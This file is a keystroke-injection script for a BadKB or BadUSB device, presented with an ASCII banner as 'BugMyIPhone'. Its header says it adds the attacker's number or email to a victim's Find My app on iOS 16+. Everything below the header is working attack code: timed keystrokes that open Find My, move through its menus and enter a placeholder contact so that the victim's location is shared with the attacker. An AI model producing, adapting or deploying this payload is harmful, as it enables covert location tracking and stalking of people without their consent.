REM ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣤⣤⡄⢠⣤⣤⡄⠀⠀⠀⠀      ░█████╗░░█████╗░██████╗░████████╗░█████╗░██╗███╗░░██╗        
REM ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡟⢦⡀⠛⣿⠁⠀⢹⣇⠀⠀⠀⠀     ██╔══██╗██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██║████╗░██║        
REM ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢻⡆⠓⡆⠛⣶⠀⠀⣿⠁⠀⠀⠀     ██║░░╚═╝███████║██████╔╝░░░██║░░░███████║██║██╔██╗██║        
REM ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢹⡆⠓⡄⢹⡆⠀⠉⣷⠀⠀      ██║░░██╗██╔══██║██╔═══╝░░░░██║░░░██╔══██║██║██║╚████║        
REM ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⡇⢹⠈⢹⡇⠀⡿⣤⠀      ╚█████╔╝██║░░██║██║░░░░░░░░██║░░░██║░░██║██║██║░╚███║        
REM ⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⡀⠈⣿⣀⣹⠀⠙⠛⠃⠘⠛⢣⣄⠀  ░╚════╝░╚═╝░░╚═╝╚═╝░░░░░░░░╚═╝░░░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝        
REM ⠀⠀⠀⠀⣰⠶⠞⠛⠛⠛⠛⠳⠶⣆⡿⠀⠀⠀⠀⢀⣀⣤⠀⠙⣷⠀
REM ⠀⠀⣤⠾⠉⠀⠀⠀⠀⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠸⠿⠿⠀⠀⣉⣷ ██████╗░░█████╗░███╗░░██╗██╗░░██╗  ██████╗░░█████╗░██████╗░██████╗░██╗████████╗
REM ⠀⢸⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⣿ ██╔══██╗██╔══██╗████╗░██║██║░██╔╝  ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║╚══██╔══╝
REM ⠀⢸⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⣿ ██║░░██║███████║██╔██╗██║█████═╝░  ██████╔╝███████║██████╦╝██████╦╝██║░░░██║░░░
REM ⢸⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣤⣤⡟⠛ ⠀██║░░██║██╔══██║██║╚████║██╔═██╗░  ██╔══██╗██╔══██║██╔══██╗██╔══██╗██║░░░██║░░░
REM ⠀⠺⣧⡀⢠⣀⠀⠀⣀⣟⠛⠛⣧⣄⡀⠀⠀⣸⡇⠀⣿⠉⠀⠀⠀ ⠀██████╔╝██║░░██║██║░╚███║██║░╚██╗  ██║░░██║██║░░██║██████╦╝██████╦╝██║░░░██║░░░
REM ⠀⠀⠀⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠀⠀⠀ ⠀╚═════╝░╚═╝░░╚═╝╚═╝░░╚══╝╚═╝░░╚═╝  ╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░╚═════╝░╚═╝░░░╚═╝░░░
REM
REM   Title: BugMyIPhone
REM   Author: @CptDankRabbit
REM   Description: This BadKB Script will add your Number/Email to the Victims “Find My” App. (Requires Full Keyboard Access)
REM   Target: IOS 16+

GUI H
DELAY 600
GUI SPACE
DELAY 500
STRING Find My
ENTER
REM This Delay is to give the App time to load
DELAY 4000
DOWN
DELAY 300
DOWN
DELAY 300
TAB
DELAY 300
TAB
DELAY 300
SPACE
DELAY 300
SPACE
DELAY 700
REM Change the String Below to your Number/Email
STRING NUMBER/EMAIL_HERE
DELAY 500
ENTER
DELAY 500
UP
DELAY 500
RIGHT
DELAY 500
RIGHT
DELAY 400
SPACE
DELAY 650
UP
DELAY 500
SPACE
DELAY 300
SPACE
DELAY 500
GUI H
